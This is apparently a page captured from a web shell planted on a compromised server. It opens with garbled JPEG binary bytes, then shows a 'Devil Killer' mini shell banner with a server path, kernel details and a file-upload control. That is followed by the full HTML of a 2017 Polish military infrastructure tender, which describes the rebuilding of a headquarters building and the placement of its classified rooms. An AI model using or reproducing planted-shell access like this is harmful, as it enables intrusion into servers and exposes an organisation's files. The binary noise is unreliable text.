JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20171031/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20171031/609622-N-2017.html

 <script type="text/javascript">//<![CDATA[//]]></script> <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 609622-N-2017 z dnia 2017-10-31 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">Wojskowy Zarząd Infrastruktury w Poznaniu</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h">Zadanie 55173 Przebudowa budynku sztabowego nr 3 CSWLąd Poznań - roboty budowlane</span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Roboty budowlane</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie obowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zamówienia publicznego</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii">Nie</span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu"></span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy">Nie</span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia"></span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Nie</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Nie</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl"></span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Nie</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej - mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc"></span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy"></span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">Wojskowy Zarząd Infrastruktury w Poznaniu</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">63015300300000</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">ul. Kościuszki</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu"></span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">60967 </span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Poznań</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">wielkopolskie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">618 573 323</span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">kszp@wzipoznan.pl</span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax">061 8572727, 8572489</span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url">www.wzipoznan.wp.mil.pl</span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej"></span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia"></span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Inny (proszę określić):</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny">Jednostka Budżetowa MON</span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia"></span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia"></span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja"></span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony"></span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Nie</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne"></span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Nie</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny"></span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Tak</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny">pocztą, kurierem, osobiście</span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres">Wojskowy Zarząd Infrastruktury, ul Kościuszki 92/98, 61-716 Poznań</span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu">Zadanie 55173 Przebudowa budynku sztabowego nr 3 CSWLąd Poznań - roboty budowlane</span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny">98/WZI/17/WB</span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Roboty budowlane</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Nie</span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski"></span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci"></span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci"></span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy"></span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu">,,Przebudowa budynku sztabowego nr 3 CSWLąd Poznań"W ramach zadania, Wykonaniu podlegać będzie m.in.:I.	OPIS BUDYNKUBudynek nr 3 zlokalizowanego jest na terenie zamkniętym, użytkowanym przez CSWLąd w Poznaniu. Budynek ujęty jest w gminnej ewidencji zabytków, należy do tzw. obiektów i kompleksów architektury obronnej. Przebudowa budynku ma na celu poprawienie właściwości termoizolacyjnych obiektu, dostosowanie obiektu do przepisów ochrony przeciwpożarowej, bezpieczeństwa i higieny pracy oraz bezpieczeństwa fizycznego i technicznego obiektu. Przebudowa dostosuje budynek do obecnie obowiązujących norm i standardów dla obiektów wojskowych oraz norm ogólnobudowlanych. Budynek podlegający przebudowie został wybudowany w 1913 r. Przedmiotowy obiekt to budynek trzykondygnacyjny, podpiwniczony, z dwoma klatkami schodowymi, z nieużytkowym poddaszem i wielospadowym dachem (spadek 440). Wykonany jest w technologii tradycyjnej murowanej.Obecnie budynek nr 3 zasilany jest ze stacji transformatorowej nr MST 733 znajdującej się w budynku nr 67. Od strony budynku nr 3 kabel doprowadzony jest do wnękowego złącza kablowego. Obok złącza kablowego zainstalowany jest ręczny przełącznik sieć-agregat Do budynku doprowadzone są następujące przyłącza sanitarne:o	przyłącze wodociągowe,o	dwa przyłącza kanalizacji sanitarnej odprowadzające ścieki sanitarne z budynku,o	przyłącza kanalizacji deszczowej odprowadzające wody opadowe z rur spustowych,o	przyłącze cieplne c.o. w technologii tradycyjnej, prowadzone w kanale ciepłowniczym. ilość kondygnacji: 3 powierzchnia zabudowy budynku: 530,83 m2 powierzchnia całkowita budynku:	1828,94 m2 (z poddaszem nieużytkowym) powierzchnia użytkowa budynku:	1072,81 m2 kubatura budynku:	7 160 m3 wysokość budynku do kalenicy:	18,28 m	II.	ZAKRES ZAMÓWIENIA OBEJMUJE WYKONANIE:Zadanie polega na wykonaniu przebudowy budynku nr 3 w kompleksie wojskowym k-2725 Poznań.POWIERZCHNIA PO PRZEBUDOWIE:Kubatura -	7160,0 m3 - bez zmian;Powierzchnia całkowita - 1415,46 m2 - po ociepleniu wewnętrznym ścian całego budynku bez poddasza nieużytkowego;Powierzchnia bez pomieszczeń Poczty -1364,32 m2. W ZAKRESIE PRZEBUDOWY ISTNIEJĄCEGO BUDYNKU NR 3:PIWNICE W części piwnic, w pom. 00/5, 00/6 i 00/7 projektuje się zlokalizować schron OPL. W pozostałych pomieszczeniach projektuje się rozdzielnię ciepła, pompownię ppoż., rozdzielnię prądu, pomieszczenie porządkowe, pomieszczenia techniczne,. Pomieszczenia gospodarcze (magazynowe) i sanitariat ogólnodostępny.PARTER Na parterze zlokalizowane będą pomieszczenia kancelaryjne dla żołnierzy zawodowych i pracowników wojska w tym pomieszczenia kancelarii tajnych i pomieszczenia przeznaczone do przetwarzania informacji o klauzuli Tajne: - biblioteka tajna, zespół kancelarii Tajnej ZKMRJ, pom. do prac niejawnych dwa sanitariaty męskie. Na parterze część pomieszczeń zajmuje Poczta. I PIĘTRONa I piętrze zlokalizowano pomieszczenia komendanta, zastępcy komendanta, sekretariat, pomieszczenia do przetwarzania informacji oraz pomieszczenia kancelaryjne dla żołnierzy zawodowych i pracowników wojska. Po lewej stronie budynku lokalizowany jest sanitariat dla kobiet, a po prawej stronie budynku lokalizowany jest sanitariat dla mężczyzn.II PIĘTRONa II piętrze zlokalizowano pomieszczenia kancelaryjne dla żołnierzy zawodowych i pracowników wojska, salę odpraw oraz pomieszczenie przeznaczone do przetwarzania informacji o klauzuli Tajne. Po lewej stronie budynku lokalizowany jest sanitariat dla kobiet, po prawej stronie budynku lokalizowany jest sanitariat dla mężczyzn.PODDASZENa poddaszu zlokalizowano pomieszczenie techniczne z centralami wentylacyjnymi.W budynku znajdują się też dwie klatki schodowe. Klatka prawa została częściowo wyremontowana. Natomiast klatkę lewą należy zmodernizować. W obydwu klatkach projektuje się zamontowanie klapy oddymiających i wykonać drzwi ewakuacyjne służących również jako nawiew w czasie pożaru.ZAKRES ROBÓT BUDOWLANYCH:?	nadproża i konstrukcje wsporcze w budynku wykonać z belek stalowych;?	ściany wewnętrzne działowe i zamurowania z cegieł ceramicznych pełnych wykonać na zaprawie cementowo-wapiennej;?	system wentylacji mechanicznej wywiewnej;?	studzienka bezodpływowa w pom. 00/15 z betonu zbrojonego;?	wymiana stolarki i ślusarki okiennej;?	wymiana stolarki i ślusarki drzwiowej wewnętrznej i zewnętrznej;?	montaż żaluzji i rolet;?	wykonanie nowych posadzek;?	wykonanie tynków cienkowarstwych na ścianach korytarzy i klatek schodowych;?	w pomieszczeniach sanitarnych wykonanie glazury;?	malowanie wszystkich pomieszczeń farbami akrylowymi lub lateksowymi;?	wykonać parapety z konglomeratu marmurowego gr. 2 cm;?	w pomieszczeniach sanitarnych i w holu głównym oraz w wydzielonych pomieszczeniach wykonać sufity podwieszone z płyt cementowych zbrojonych siatką z włókna szklanego gr. 1,25 cm na systemowej konstrukcji stalowej;?	w pomieszczeniach kancelaryjnych i w korytarzach wykonać sufity podwieszone z płyty z prasowanej wełny mineralnej gr.1,5 cm o wym. 60x60cm na widocznej konstrukcji stalowej systemowej;?	ścianki działowe lekkie w pomieszczeniach biurowych wykonać na konstrukcji stalowej, z dwóch stron po dwie warstwy płyt gipsowo-kartonowych;?	w dachu każdej klatki schodowej należy wykonać typowe klapy 110x110cm, wysokości 50cm, o podstawie prostej z blachy stalowej ocynkowanej, wyposażone w kopułkę w wykonaniu aluminiowo-poliwęglanowym i wyposażone w napęd elektryczny typu ZA;?	ze względu na opinię konserwatora zabytków oraz ze względu na niedawno wyremontowaną elewację należy wykonać ocieplenie budynku od wewnątrz mineralnymi płytami (bloczkami) izolacyjnymi wykonanymi z bardzo lekkiej odmiany betonu komórkowego. Ich gęstość powinna wynosi do 115 kg/m3;?	ze względu na zbyt małe wymiary klatek schodowych (zbyt wąskie, za krótkie spoczniki), nie zostały one ocieplone. Należy wykonać izolację ściany pomieszczeń sąsiadujących z klatkami schodowymi;?	wykonanie ocieplenia stropu nad II piętrem;?	wykonanie ocieplenia połaci dachowej nad pom. technicznym i klatkami schodowymi;?	wykonanie ocieplenia i pokrycie stropodachu nad holem;?	wykonanie izolacji przeciwwodnej i przeciwwilgociowej;?	po wykonaniu drzwi ewakuacyjnych należy odtworzyć elementy elewacji - odtworzyć cokół ceglany (uzupełnić płytki ceglane), a ściany zewnętrzne powyżej cokołu otynkować i pomalować w kolorze istniejących ścian;?	w budynku należy wykonać n/w instalacje:o	instalację zimnej i ciepłej wody użytkowej; o	instalację wody przeciwpożarowej;o	kanalizację sanitarną i technologiczną;o	instalację ogrzewania budynku c.o.;o	instalację grzewczą technologiczną;o	wentylację mechaniczną nawiewno-wywiewną; o	system klimatyzacji w pomieszczeniach biurowych oraz serwerowi;o	instalację sprężonego powietrza;o	instalację oświetleniową i ewakuacyjną;o	instalację gniazd wtyczkowych 1 i 3 - fazowych;o	instalację zasilania punktów abonenckich sieci komputerowej; o	instalację zasilania wentylacji i klimatyzacji;o	instalację odgromowa;o	instalację połączeń wyrównawczych;o	ochronę przepięciową;o	ochronę od porażeń; o	instalację sieci strukturalnej; o	instalację zasilania punktów abonenckich sieci komputerowej; o	instalację zasilania urządzeń systemów teletechnicznych; o	system sygnalizacji pożaru i oddymiania;o	system sygnalizacji włamania i napadu (SSWiN);o	telewizyjny system nadzoru (TSN);o	system kontroli dostępu (SKD); o	systemy multimedialne;o	połączenia między budynkowe;o	instalację zasilania zespołu hydroforowego;o	instalację filtrów separujących i zabezpieczających przed ulotem informacji niejawnych. W ZAKRESIE ZAGOSPODAROWANIA TERENU:?	wykonanie przyłącza wodociągowego z rur PE PN16 ?75x6,8 wraz z montażem węzła wodomierzowego w budynku; L?20mb;?	wykonanie przyłącza grawitacyjnej kanalizacji sanitarnej z rur PVC-U kl.S ?160; L ? 20,0 mb;?	wykonanie przyłącza instalacji klimatyzacji z rury stalowej zabezpieczonej antykorozyjnie ?250; L ? 5,0 mb;?	demontaż istniejącego przyłącza wodociągowego ?50 ozn. ,,woB50" na odcinku projektowanego przyłącza ,,Wi.1"-,,W.2"; L ? 15,0 mb;?	wykonanie przyłącza elektroenergetyczne - wymiana złącza kablowego na nowe typu ZK-2a - nowe złącze podobnie jak i stare wyposażyć w ręczny przełączniki (sieć agregat) wyposażony w zaciski umożliwiające podłączenie mobilnego agregatu prądotwórczego; nad złączem zainstalować przeciwpożarowy wyłącznik prądu wyposażony w przekaźnik napięciowy sterowany przyciskami ppoż. wyposażonymi w jeden styk NO i jeden styk NC;?	wykonanie zasilania agregatów chłodniczych instalacji klimatyzacji;?	wykonanie dwóch nowych wyjść ewakuacyjnych, bezpośrednio z klatek schodowych na zewnątrz budynku, przed wyjściami chodniki łączące wyjścia z istniejącym placem przed budynkiem;?	wykonanie dojścia technicznego do terenu ogrodzonego przy agregatach klimatyzacyjnych;?	wykonanie ogrodzenia wokół nowoprojektowanych agregatów klimatyzacyjnych o wys. 2,0 m z paneli z prętów stalowych zespawanych ze sobą w kratownicę o oczku 50x200 mm na słupkach stalowych o przekroju kwadratowym osadzanych w typowych fundamentach prefabrykowanych. W ogrodzeniu furtka o szerokości 1,20 mb;?	w odległości ok. 0,5 m od ogrodzenia nasadzenia tują kolumnową lub stożkowatą;?	wykonanie fundamentów betonowych pod agregaty chłodnicze.PIERWSZE WYPOSAŻENIE:?	wykonawca dostarczy, zamontuje i uruchomi sprzęt zgodnie z dokumentacją projektową oraz przedstawi dokumentację techniczno-ruchową i przeszkoli osoby wyznaczone przez Użytkownika do obsługi.III.	WYKONAWCA JEST ZOBOWIĄZANY DO:1.	Opracowania planu rozmieszczenia urządzeń ppoż. oraz oznakowania dróg ewakuacyjnych.2.	Sporządzenia przed rozpoczęciem budowy planu bezpieczeństwa i ochrony zdrowia.3.	Prowadzenia obsługi geodezyjnej budowy i sporządzenia powykonawczej inwentaryzacji geodezyjnej.4.	Wykonania pomiarów kontrolnych instalacji.5.	Przeszkolenia przedstawicieli Użytkownika w zakresie obsługi wszystkich zamontowanych urządzeń.6.	Przygotowania dokumentów i zgłoszenia urządzeń do odbioru przez Wojskowy Dozór Techniczny.7.	Sporządzenia powykonawczej dokumentacji projektowej w oparciu o dostarczony projekt budowlany i wykonawczy.8.	Wykonania Ekspertyzy termograficznej izolacyjności termicznej przegród zewnętrznych budynku.9.	Wykonanie Świadectwa charakterystyki energetycznej.10.	Oznakowania pomieszczeń wraz z wyposażeniem skrzydeł drzwiowych w urządzenia do plombowania drzwi i odbojniki.11.	Uzyskania pozwolenia na użytkowanie na podstawie Upoważnienia przedłożonego przez Zamawiającego.12.	Wykonania i zamontowania przy wejściu głównym do obiektu w miejscu uzgodnionym z Użytkownikiem i Inspektorem Nadzoru tablicę informacyjną o wymiarach 80 x 60 cm zawierającą wygrawerowane informacje o Inwestorze zadania, Wykonawcy robót, okresie realizacji zadania. Tablica winna być wykonana z blachy nierdzewnej (gr. 3 mm) lub granitu (gr. 2 - 3 cm).13.	Do obowiązków Wykonawcy należeć będzie również:a)	przekazanie Zamawiającemu i Administratorowi informacji niezbędnychdo zgłoszenia instalacji, których eksploatacja wymaga zgłoszenia zgodniez Rozporządzeniem Ministra Środowiska z dnia 2 lipca 2010 r. w sprawie rodzajów instalacji, których eksploatacja wymaga zgłoszenia (Dz.U.2010.130.880) oraz informacji na temat przypadków, w których wprowadzanie gazów lub pyłów do powietrza z instalacji nie wymaga pozwolenia zgodnie z Rozporządzeniem Ministra Środowiska z dnia 2 lipca 2010 r. w sprawie przypadków, w których wprowadzanie gazów lub pyłów do powietrza z instalacji nie wymaga pozwolenia (Dz.U.2010.130.881);b)	dostarczenie Zamawiającemu dokumentacji powykonawczej geodezyjnej oraz inwentaryzacji 